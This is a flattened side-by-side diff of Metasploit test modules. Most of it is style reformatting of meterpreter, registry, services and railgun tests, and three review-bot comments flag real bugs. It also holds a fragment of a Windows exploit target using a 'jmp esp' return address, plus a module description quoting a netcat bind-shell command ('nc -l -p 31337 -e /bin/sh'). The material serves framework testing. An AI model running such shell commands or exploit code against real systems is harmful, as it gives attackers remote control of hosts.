'Ret' => 0x80502d7f, # jmp esp 'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win', 'Platform' => 'win',
'Payload' => 'Payload' =>
{ {
'ExtendedOptions' => 'ExtendedOptions' =>
{ {
'Stager' => 'sud_syscall_hook', 'Stager' => 'sud_syscall_hook',
'Recovery' => 'spin' 'Recovery' => 'spin'
} }
} }
} }
], ],
], ],
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
def autofilter def autofilter
@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
udp_sock.put(buf) udp_sock.put(buf)
select(nil,nil,nil,2) select(nil, nil, nil, 2)
disconnect_udp disconnect_udp
end end


@ -3,38 +3,39 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Command Test', update_info(
'Description' => %q{ info,
This module tests cmd payloads by targeting (for example) a server 'Name' => 'Command Test',
like: nc -l -p 31337 -e /bin/sh 'Description' => %q{
}, This module tests cmd payloads by targeting (for example) a server
'Author' => 'egypt', like: nc -l -p 31337 -e /bin/sh
'References' => [ ],
'DefaultOptions' => { },
'Payload' =>
{
}, },
'Platform' => 'unix', 'Author' => 'egypt',
'Arch' => ARCH_CMD, 'References' => [ ],
'Targets' => 'DefaultOptions' => {},
[ 'Payload' => {
[ 'Automatic Targeting', { } ], },
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [
[ 'Automatic Targeting', {} ],
], ],
'DefaultTarget' => 0 'DefaultTarget' => 0
)) )
)
register_options( register_options(
[ [
Opt::RPORT(31337), Opt::RPORT(31337),
], self.class) ], self.class
)
end end
def autofilter def autofilter


@ -9,13 +9,16 @@ class MetasploitModule < Msf::Post
include Msf::Post::File include Msf::Post::File
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Meterpreter cmd_exec test', update_info(
'Description' => %q( This module will test the meterpreter cmd_exec API ), info,
'License' => MSF_LICENSE, 'Name' => 'Meterpreter cmd_exec test',
'Platform' => ['windows', 'linux', 'unix'], 'Description' => %q( This module will test the meterpreter cmd_exec API ),
'SessionTypes' => ['meterpreter'] 'License' => MSF_LICENSE,
)) 'Platform' => ['windows', 'linux', 'unix'],
'SessionTypes' => ['meterpreter']
)
)
end end
def test_cmd_exec def test_cmd_exec
@ -107,6 +110,5 @@ class MetasploitModule < Msf::Post
output == test_string output == test_string
end end
end end
end end
end end


@ -1,4 +1,3 @@
require 'rex' require 'rex'
lib = File.join(Msf::Config.install_root, "test", "lib") lib = File.join(Msf::Config.install_root, "test", "lib")
@ -9,23 +8,24 @@ class MetasploitModule < Msf::Post
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Test Meterpreter ExtAPI Stuff', update_info(
'Description' => %q{ This module will test Windows Extended API methods }, info,
'License' => MSF_LICENSE, 'Name' => 'Test Meterpreter ExtAPI Stuff',
'Author' => [ 'Ben Campbell'], 'Description' => %q{ This module will test Windows Extended API methods },
'Platform' => [ 'windows', ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter' ] 'Author' => [ 'Ben Campbell'],
)) 'Platform' => [ 'windows', ],
'SessionTypes' => [ 'meterpreter' ]
)
)
end end
# #
# Check the extension is loaded... # Check the extension is loaded...
# #
def setup def setup
unless session.extapi unless session.extapi
vprint_status("Loading extapi extension...") vprint_status("Loading extapi extension...")
begin begin
@ -60,9 +60,9 @@ class MetasploitModule < Msf::Post
it "should return clipboard jpg dimensions" do it "should return clipboard jpg dimensions" do
ret = false ret = false
#VK_PRINTSCREEN 154 Maybe needed on XP? # VK_PRINTSCREEN 154 Maybe needed on XP?
#VK_SNAPSHOT 44 # VK_SNAPSHOT 44
session.railgun.user32.keybd_event(44,0,0,0) session.railgun.user32.keybd_event(44, 0, 0, 0)
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0) session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
clipboard = session.extapi.clipboard.get_data(false) clipboard = session.extapi.clipboard.get_data(false)
@ -96,22 +96,22 @@ class MetasploitModule < Msf::Post
text = Rex::Text.rand_text_alphanumeric(1024) text = Rex::Text.rand_text_alphanumeric(1024)
ret = session.extapi.clipboard.set_text(text) ret = session.extapi.clipboard.set_text(text)
clipboard = session.extapi.clipboard.get_data(true) clipboard = session.extapi.clipboard.get_data(true)
ret = clipboard && clipboard.first && (clipboard.first[:type] == :text) && (clipboard.first[:data] == text) ret = clipboard && clipboard.first && (clipboard.first[:type] == :text) && (clipboard.first[:data] == text)
end end
if session.railgun.user32 if session.railgun.user32
it "should download clipboard jpg data" do it "should download clipboard jpg data" do
ret = false ret = false
#VK_PRINTSCREEN 154 Maybe needed on XP? # VK_PRINTSCREEN 154 Maybe needed on XP?
#VK_SNAPSHOT 44 # VK_SNAPSHOT 44
session.railgun.user32.keybd_event(44,0,0,0) session.railgun.user32.keybd_event(44, 0, 0, 0)
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0) session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
clipboard = session.extapi.clipboard.get_data(true) clipboard = session.extapi.clipboard.get_data(true)
if clipboard && clipboard.first && (clipboard.first[:type] == :jpg) && !(clipboard.first[:data].empty?) if clipboard && clipboard.first && (clipboard.first[:type] == :jpg) && !(clipboard.first[:data].empty?)
# JPG Magic Bytes # JPG Magic Bytes
ret = (clipboard.first[:data][0,2] == "\xFF\xD8") ret = (clipboard.first[:data][0, 2] == "\xFF\xD8")
end end
ret ret
@ -183,14 +183,14 @@ class MetasploitModule < Msf::Post
windows = session.extapi.window.enumerate(true, nil) windows = session.extapi.window.enumerate(true, nil)
if windows && windows.any? if windows && windows.any?
unknowns = windows.select {|w| w[:title] == "<unknown>"} unknowns = windows.select { |w| w[:title] == "<unknown>" }
ret = !unknowns.empty? ret = !unknowns.empty?
end end
ret ret
end end
parent = windows.select {|w| w[:title] =~ /program manager/i} parent = windows.select { |w| w[:title] =~ /program manager/i }
if parent && parent.first if parent && parent.first
it "should return an array of a windows children" do it "should return an array of a windows children" do


@ -1,25 +1,27 @@
lib = File.join(Msf::Config.install_root, "test", "lib") lib = File.join(Msf::Config.install_root, "test", "lib")
require 'module_test' require 'module_test'
#load 'test/lib/module_test.rb' # load 'test/lib/module_test.rb'
#load 'lib/rex/text.rb' # load 'lib/rex/text.rb'
#load 'lib/msf/core/post/common.rb' # load 'lib/msf/core/post/common.rb'
class MetasploitModule < Msf::Post class MetasploitModule < Msf::Post
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
include Msf::Post::Common include Msf::Post::Common
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Test Post::Common Get Envs', update_info(
'Description' => %q{ This module will test Post::Common get envs API methods }, info,
'License' => MSF_LICENSE, 'Name' => 'Test Post::Common Get Envs',
'Author' => [ 'Ben Campbell'], 'Description' => %q{ This module will test Post::Common get envs API methods },
'Platform' => [ 'windows', 'linux', 'java', 'python' ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter', 'shell' ] 'Author' => [ 'Ben Campbell'],
)) 'Platform' => [ 'windows', 'linux', 'java', 'python' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
)
)
end end
def test_get_env_windows def test_get_env_windows
@ -41,7 +43,7 @@ class MetasploitModule < Msf::Post
it "should return user" do it "should return user" do
user = get_env('USER') user = get_env('USER')
!user.blank? !user.blank?
end end
it "should handle $ sign" do it "should handle $ sign" do
user = get_env('$USER') user = get_env('$USER')
@ -52,7 +54,7 @@ class MetasploitModule < Msf::Post
def test_get_envs def test_get_envs
it "should return multiple envs" do it "should return multiple envs" do
res = get_envs('PATH','USERNAME','USER') res = get_envs('PATH', 'USERNAME', 'USER')
if session.platform =~ /win/i if session.platform =~ /win/i
!res['PATH'].blank? && !res['USERNAME'].blank? !res['PATH'].blank? && !res['USERNAME'].blank?
else else
@ -62,4 +64,3 @@ class MetasploitModule < Msf::Post
end end
end end


@ -1,4 +1,3 @@
require 'rex/post/meterpreter/extensions/stdapi/command_ids' require 'rex/post/meterpreter/extensions/stdapi/command_ids'
require 'rex' require 'rex'
@ -10,20 +9,24 @@ class MetasploitModule < Msf::Post
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Testing Meterpreter Stuff', update_info(
'Description' => %q{ This module will test meterpreter API methods }, info,
'License' => MSF_LICENSE, 'Name' => 'Testing Meterpreter Stuff',
'Author' => [ 'egypt'], 'Description' => %q{ This module will test meterpreter API methods },
'Platform' => [ 'windows', 'linux', 'java' ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter' ] 'Author' => [ 'egypt'],
)) 'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter' ]
)
)
register_options( register_options(
[ [
OptBool.new("AddEntropy" , [false, "Add entropy token to file and directory names.", false]), OptBool.new("AddEntropy", [false, "Add entropy token to file and directory names.", false]),
OptString.new("BaseFileName" , [true, "File/dir base name", "meterpreter-test"]) OptString.new("BaseFileName", [true, "File/dir base name", "meterpreter-test"])
], self.class) ], self.class
)
end end
# #
@ -81,7 +84,7 @@ class MetasploitModule < Msf::Post
ret &&= (list && list.length > 0) ret &&= (list && list.length > 0)
if session.commands.include? Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_SYS_PROCESS_GETPID if session.commands.include? Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_SYS_PROCESS_GETPID
pid ||= session.sys.process.getpid pid ||= session.sys.process.getpid
process = list.find{ |p| p['pid'] == pid } process = list.find { |p| p['pid'] == pid }
vprint_status("PID info: #{process.inspect}") vprint_status("PID info: #{process.inspect}")
ret &&= !(process.nil?) ret &&= !(process.nil?)
else else
@ -90,7 +93,6 @@ class MetasploitModule < Msf::Post
ret ret
end end
end end
def test_sys_config def test_sys_config
@ -125,7 +127,7 @@ class MetasploitModule < Msf::Post
ifaces = session.net.config.get_interfaces ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0) res = !!(ifaces and ifaces.length > 0)
res &&= !! ifaces.find { |iface| res &&= !!ifaces.find { |iface|
iface.addrs.find { |addr| iface.addrs.find { |addr|
addr == session.session_host addr == session.session_host
} }
@ -141,13 +143,12 @@ class MetasploitModule < Msf::Post
routes and routes.length > 0 routes and routes.length > 0
end end
end end
end end
def test_fs def test_fs
vprint_status("Starting filesystem tests") vprint_status("Starting filesystem tests")
if datastore["AddEntropy"] if datastore["AddEntropy"]
entropy_value = '-' + ('a'..'z').to_a.shuffle[0,8].join entropy_value = '-' + ('a'..'z').to_a.shuffle[0, 8].join
else else
entropy_value = "" entropy_value = ""
end end
@ -252,7 +253,7 @@ class MetasploitModule < Msf::Post
res = true res = true
remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt" remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt"
vprint_status("Remote File Name: #{remote}") vprint_status("Remote File Name: #{remote}")
local = __FILE__ local = __FILE__
vprint_status("uploading") vprint_status("uploading")
session.fs.file.upload_file(remote, local) session.fs.file.upload_file(remote, local)
vprint_status("done") vprint_status("done")
@ -333,7 +334,7 @@ class MetasploitModule < Msf::Post
res = true res = true
remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt" remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt"
vprint_status("Remote File Name: #{remote}") vprint_status("Remote File Name: #{remote}")
local = __FILE__ local = __FILE__
vprint_status("uploading") vprint_status("uploading")
session.fs.file.upload_file(remote, local) session.fs.file.upload_file(remote, local)
vprint_status("done") vprint_status("done")
@ -342,20 +343,19 @@ class MetasploitModule < Msf::Post
if res if res
remote_md5 = session.fs.file.md5(remote) remote_md5 = session.fs.file.md5(remote)
local_md5 = Digest::MD5.digest(::File.read(local, mode: 'rb')) local_md5 = Digest::MD5.digest(::File.read(local, mode: 'rb'))
remote_sha = session.fs.file.sha1(remote) remote_sha = session.fs.file.sha1(remote)
local_sha = Digest::SHA1.digest(::File.read(local, mode: 'rb')) local_sha = Digest::SHA1.digest(::File.read(local, mode: 'rb'))
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5,'')}") vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5, '')}")
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5,'')}") vprint_status("local md5 : #{Rex::Text.to_hex(local_md5, '')}")
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha,'')}") vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha, '')}")
vprint_status("local sha : #{Rex::Text.to_hex(local_sha,'')}") vprint_status("local sha : #{Rex::Text.to_hex(local_sha, '')}")
res &&= (remote_md5 == local_md5) res &&= (remote_md5 == local_md5)
end end
session.fs.file.rm(remote) session.fs.file.rm(remote)
res res
end end
end end
=begin =begin
@ -387,7 +387,7 @@ class MetasploitModule < Msf::Post
super super
end end
protected protected
def create_directory(name) def create_directory(name)
res = true res = true
@ -403,5 +403,4 @@ protected
res res
end end
end end
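Review bot: In the upload test of the `@ -342,20 +343,19` hunk, `remote_sha` and `local_sha` are computed and printed but never compared. Only `res &&= (remote_md5 == local_md5)` feeds the result, so a wrong value from `session.fs.file.sha1` would still let the test pass. I would add `res &&= (remote_sha == local_sha)` right after the MD5 comparison. The local file is also read twice; reading it once into a variable and hashing that keeps both digests over the same bytes. The enclosing `it` block starts outside the hunk.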


@ -1,5 +1,3 @@
lib = File.join(Msf::Config.install_root, "test", "lib") lib = File.join(Msf::Config.install_root, "test", "lib")
require 'module_test' require 'module_test'
@ -9,14 +7,17 @@ class MetasploitModule < Msf::Post
include Msf::Post::File include Msf::Post::File
include Msf::Post::Windows::FileInfo include Msf::Post::Windows::FileInfo
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Railgun API Tests', update_info(
'Description' => %q{ This module will test railgun api functions }, info,
'License' => MSF_LICENSE, 'Name' => 'Railgun API Tests',
'Author' => [ 'Spencer McIntyre' ], 'Description' => %q{ This module will test railgun api functions },
'Platform' => [ 'linux', 'osx', 'windows' ] 'License' => MSF_LICENSE,
)) 'Author' => [ 'Spencer McIntyre' ],
'Platform' => [ 'linux', 'osx', 'windows' ]
)
)
end end
def test_api_function_calls_libc def test_api_function_calls_libc
@ -89,6 +90,7 @@ class MetasploitModule < Msf::Post
def test_api_function_file_info_windows def test_api_function_file_info_windows
return unless session.platform == 'windows' return unless session.platform == 'windows'
it "Should retrieve the win32k file version" do it "Should retrieve the win32k file version" do
path = expand_path('%WINDIR%\\system32\\win32k.sys') path = expand_path('%WINDIR%\\system32\\win32k.sys')
major, minor, build, revision, brand = file_version(path) major, minor, build, revision, brand = file_version(path)
@ -98,6 +100,7 @@ class MetasploitModule < Msf::Post
def test_api_function_calls_windows def test_api_function_calls_windows
return unless session.platform == 'windows' return unless session.platform == 'windows'
it "Should include error information in the results" do it "Should include error information in the results" do
ret = true ret = true
result = session.railgun.kernel32.GetCurrentProcess() result = session.railgun.kernel32.GetCurrentProcess()


@ -1,4 +1,3 @@
## ##
# This module requires Metasploit: https://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
@ -14,43 +13,45 @@ class MetasploitModule < Msf::Post
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'railgun_testing', update_info(
'Description' => %q{ This module will test railgun code used in post modules}, info,
'License' => MSF_LICENSE, 'Name' => 'railgun_testing',
'Author' => [ 'kernelsmith'], 'Description' => %q{ This module will test railgun code used in post modules},
'Platform' => [ 'windows' ] 'License' => MSF_LICENSE,
)) 'Author' => [ 'kernelsmith'],
'Platform' => [ 'windows' ]
)
)
register_options( register_options(
[ [
OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]), OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]),
OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]), OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]),
OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]), OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]),
OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]), OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]),
], self.class) ], self.class
)
end end
# #
# Return an array of windows constants names matching +winconst+ # Return an array of windows constants names matching +winconst+
# #
def select_const_names(winconst, filter_regex=nil) def select_const_names(winconst, filter_regex = nil)
session.railgun.constant_manager.select_const_names(winconst, filter_regex) session.railgun.constant_manager.select_const_names(winconst, filter_regex)
end end
# #
# Returns an array of windows error code names for a given windows error code matching +err_code+ # Returns an array of windows error code names for a given windows error code matching +err_code+
# #
def lookup_error(err_code, filter_regex=nil) def lookup_error(err_code, filter_regex = nil)
select_const_names(err_code, /^ERROR_/).select do |name| select_const_names(err_code, /^ERROR_/).select do |name|
name =~ filter_regex name =~ filter_regex
end end
end end
def test_static def test_static
it "should return a constant name given a const and a filter" do it "should return a constant name given a const and a filter" do
ret = true ret = true
results = select_const_names(4, /^SERVICE/) results = select_const_names(4, /^SERVICE/)
@ -78,16 +79,14 @@ class MetasploitModule < Msf::Post
ret ret
end end
end end
def test_datastore def test_datastore
if (datastore["WIN_CONST"]) if (datastore["WIN_CONST"])
it "should look up arbitrary constants" do it "should look up arbitrary constants" do
ret = true ret = true
results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX']) results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}") # vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
ret ret
end end
@ -97,13 +96,10 @@ class MetasploitModule < Msf::Post
it "should look up arbitrary error codes" do it "should look up arbitrary error codes" do
ret = true ret = true
results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX']) results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.inspect}") # vprint_status("RESULTS: #{results.class} #{results.inspect}")
ret ret
end end
end end
end end
end end
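Review bot: `lookup_error` in the `@ -14,43 +13,45` hunk defaults `filter_regex` to nil but still runs `name =~ filter_regex` on every name. As far as I can tell a nil pattern never matches, so the method returns an empty array whenever no filter is given, including when the optional `ECREGEX` datastore option is unset. Guarding the match, for example `filter_regex.nil? || name =~ filter_regex` inside the `select` block, would make the default mean "no extra filtering". A short comment above the method stating that a nil filter returns every `ERROR_` name would document the intent.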


@ -1,4 +1,3 @@
## ##
# This module requires Metasploit: https://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
@ -15,23 +14,26 @@ class MetasploitModule < Msf::Post
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Registry include Msf::Post::Windows::Registry
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'registry_post_testing', update_info(
'Description' => %q{ This module will test Post::Windows::Registry API methods }, info,
'License' => MSF_LICENSE, 'Name' => 'registry_post_testing',
'Author' => [ 'Description' => %q{ This module will test Post::Windows::Registry API methods },
'License' => MSF_LICENSE,
'Author' => [
'kernelsmith', # original 'kernelsmith', # original
'egypt', # PostTest conversion 'egypt', # PostTest conversion
], ],
'Platform' => [ 'windows' ] 'Platform' => [ 'windows' ]
)) )
)
end end
def test_0_registry_read def test_0_registry_read
it "should evaluate key existence" do it "should evaluate key existence" do
k_exists = registry_key_exist?(%q#HKCU\Environment#) k_exists = registry_key_exist?(%q#HKCU\Environment#)
k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#) k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#)
(k_exists && !k_dne) (k_exists && !k_dne)
end end
@ -39,7 +41,7 @@ class MetasploitModule < Msf::Post
pending "should evaluate value existence" do pending "should evaluate value existence" do
# these methods are not implemented # these methods are not implemented
v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP") v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP")
v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf") v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf")
(v_exists && !v_dne) (v_exists && !v_dne)
end end
@ -99,7 +101,6 @@ class MetasploitModule < Msf::Post
ret ret
end end
end end
def test_1_registry_write def test_1_registry_write
@ -172,7 +173,6 @@ class MetasploitModule < Msf::Post
ret ret
end end
it "should delete unicode keys" do it "should delete unicode keys" do
ret = registry_deleteval(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str") ret = registry_deleteval(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str") valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
@ -185,9 +185,6 @@ class MetasploitModule < Msf::Post
ret ret
end end
end end
end end


@ -1,4 +1,3 @@
require 'rex/post/meterpreter/extensions/stdapi/command_ids' require 'rex/post/meterpreter/extensions/stdapi/command_ids'
require 'rex' require 'rex'
@ -10,20 +9,24 @@ class MetasploitModule < Msf::Post
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Testing Meterpreter Search', update_info(
'Description' => %q{ This module will test the meterpreter search method }, info,
'License' => MSF_LICENSE, 'Name' => 'Testing Meterpreter Search',
'Author' => [ 'timwr'], 'Description' => %q{ This module will test the meterpreter search method },
'Platform' => [ 'windows', 'linux', 'java' ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter' ] 'Author' => [ 'timwr'],
)) 'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter' ]
)
)
register_options( register_options(
[ [
OptBool.new("AddEntropy" , [false, "Add entropy token to file and directory names.", false]), OptBool.new("AddEntropy", [false, "Add entropy token to file and directory names.", false]),
OptString.new("BaseFileName" , [true, "File/dir base name", "meterpreter-test"]) OptString.new("BaseFileName", [true, "File/dir base name", "meterpreter-test"])
], self.class) ], self.class
)
end end
def setup def setup
@ -38,7 +41,7 @@ class MetasploitModule < Msf::Post
session.fs.dir.chdir(tmp) session.fs.dir.chdir(tmp)
if datastore["AddEntropy"] if datastore["AddEntropy"]
entropy_value = '-' + ('a'..'z').to_a.shuffle[0,8].join entropy_value = '-' + ('a'..'z').to_a.shuffle[0, 8].join
else else
entropy_value = "" entropy_value = ""
end end


@ -13,27 +13,31 @@ class MetasploitModule < Msf::Post
include Msf::Post::Windows::Services include Msf::Post::Windows::Services
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Test Post::Windows::Services', update_info(
'Description' => %q{ This module will test windows services methods within a shell}, info,
'License' => MSF_LICENSE, 'Name' => 'Test Post::Windows::Services',
'Author' => [ 'kernelsmith', 'egypt' ], 'Description' => %q{ This module will test windows services methods within a shell},
'Platform' => [ 'windows' ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter', 'shell' ] 'Author' => [ 'kernelsmith', 'egypt' ],
)) 'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
)
)
register_options( register_options(
[ [
OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]), OptString.new("QSERVICE", [true, "Service (keyname) to query", "winmgmt"]),
OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]), OptString.new("NSERVICE", [true, "New Service (keyname) to create/del", "testes"]),
OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]), OptString.new("SSERVICE", [true, "Service (keyname) to start/stop", "W32Time"]),
OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]), OptString.new("DNAME", [true, "Display name used for create test", "Cool display name"]),
OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]), OptString.new("BINPATH", [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto", OptEnum.new("MODE", [
["auto", "manual", "disable"] true, "Mode to use for startup/create tests", "auto",
]), ["auto", "manual", "disable"]
], self.class) ]),
], self.class
)
end end
def test_start def test_start
@ -65,7 +69,7 @@ class MetasploitModule < Msf::Post
ret &&= results.kind_of? Array ret &&= results.kind_of? Array
ret &&= results.length > 0 ret &&= results.length > 0
ret &&= results.select{|service| service[:name] == datastore["QSERVICE"]} ret &&= results.select { |service| service[:name] == datastore["QSERVICE"] }
ret ret
end end
@ -92,11 +96,11 @@ class MetasploitModule < Msf::Post
def test_create def test_create
it "should create a service #{datastore["NSERVICE"]}" do it "should create a service #{datastore["NSERVICE"]}" do
mode = case datastore["MODE"] mode = case datastore["MODE"]
when "disable"; START_TYPE_DISABLED when "disable"; START_TYPE_DISABLED
when "manual"; START_TYPE_MANUAL when "manual"; START_TYPE_MANUAL
when "auto"; START_TYPE_AUTO when "auto"; START_TYPE_AUTO
else; START_TYPE AUTO else; START_TYPE AUTO
end end
ret = service_create(datastore['NSERVICE'], ret = service_create(datastore['NSERVICE'],
display: datastore['DNAME'], display: datastore['DNAME'],
@ -151,16 +155,16 @@ class MetasploitModule < Msf::Post
ret = true ret = true
results = service_create(service_name, results = service_create(service_name,
display: display_name, display: display_name,
path: datastore['BINPATH'], path: datastore['BINPATH'],
starttype: START_TYPE_DISABLED) starttype: START_TYPE_DISABLED)
ret &&= (results == Windows::Error::SUCCESS) ret &&= (results == Windows::Error::SUCCESS)
results = service_status(service_name) results = service_status(service_name)
ret &&= results.kind_of? Hash ret &&= results.kind_of? Hash
if ret if ret
original_display = results[:display] original_display = results[:display]
results = service_change_config(service_name, {:display => Rex::Text.rand_text_alpha(5)}) results = service_change_config(service_name, { :display => Rex::Text.rand_text_alpha(5) })
ret &&= (results == Windows::Error::SUCCESS) ret &&= (results == Windows::Error::SUCCESS)
results = service_info(service_name) results = service_info(service_name)
@ -181,9 +185,9 @@ class MetasploitModule < Msf::Post
it "should start a disabled service #{service_name}" do it "should start a disabled service #{service_name}" do
ret = true ret = true
results = service_create(service_name, results = service_create(service_name,
display: display_name, display: display_name,
path: datastore['BINPATH'], path: datastore['BINPATH'],
starttype: START_TYPE_DISABLED) starttype: START_TYPE_DISABLED)
ret &&= (results == Windows::Error::SUCCESS) ret &&= (results == Windows::Error::SUCCESS)
if ret if ret
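Review bot: The `else` arm of `case datastore["MODE"]` in `test_create` reads `START_TYPE AUTO`, with a space where the `when "auto"` arm has the constant `START_TYPE_AUTO`. Ruby would parse that as a call with `AUTO` as its argument, so the arm would raise if it were ever reached. `MODE` is an `OptEnum` limited to the three handled values, so the arm is probably dead today, but it should read `else; START_TYPE_AUTO`. The `it` block continues outside the hunk.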


@ -1,12 +1,11 @@
lib = File.join(Msf::Config.install_root, "test", "lib") lib = File.join(Msf::Config.install_root, "test", "lib")
$:.push(lib) unless $:.include?(lib) $:.push(lib) unless $:.include?(lib)
require 'module_test' require 'module_test'
#load 'test/lib/module_test.rb' # load 'test/lib/module_test.rb'
#load 'lib/rex/text.rb' # load 'lib/rex/text.rb'
#load 'lib/msf/core/post/linux/system.rb' # load 'lib/msf/core/post/linux/system.rb'
#load 'lib/msf/core/post/unix/enum_user_dirs.rb' # load 'lib/msf/core/post/unix/enum_user_dirs.rb'
class MetasploitModule < Msf::Post class MetasploitModule < Msf::Post
@ -15,15 +14,18 @@ class MetasploitModule < Msf::Post
include Msf::Post::Unix include Msf::Post::Unix
include Msf::Post::Common include Msf::Post::Common
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Testing Remote Unix System Manipulation', update_info(
'Description' => %q{ This module will test Post::File API methods }, info,
'License' => MSF_LICENSE, 'Name' => 'Testing Remote Unix System Manipulation',
'Author' => [ 'egypt'], 'Description' => %q{ This module will test Post::File API methods },
'Platform' => [ 'linux', 'java' ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter', 'shell' ] 'Author' => [ 'egypt'],
)) 'Platform' => [ 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
)
)
end end
def test_unix def test_unix
@ -36,6 +38,7 @@ class MetasploitModule < Msf::Post
if ret if ret
users.each { |u| users.each { |u|
next unless u[:name] == "root" next unless u[:name] == "root"
have_root = true have_root = true
} }
end end
@ -44,8 +47,6 @@ class MetasploitModule < Msf::Post
ret ret
end end
end end
end end


@ -6,7 +6,7 @@ describe Msf::Simple::Framework do
klass = mod klass = mod
it "should be able create #{ref}" do it "should be able create #{ref}" do
e = $msf.modules.create(ref) e = $msf.modules.create(ref)
e.should_not == nil e.should_not == nil
end end
end end
end end


@ -1,7 +1,6 @@
require 'rubygems' require 'rubygems'
require 'spec/rake/spectask' require 'spec/rake/spectask'
Spec::Rake::SpecTask.new do |t| Spec::Rake::SpecTask.new do |t|
t.ruby_opts = ['-rtest/unit'] t.ruby_opts = ['-rtest/unit']
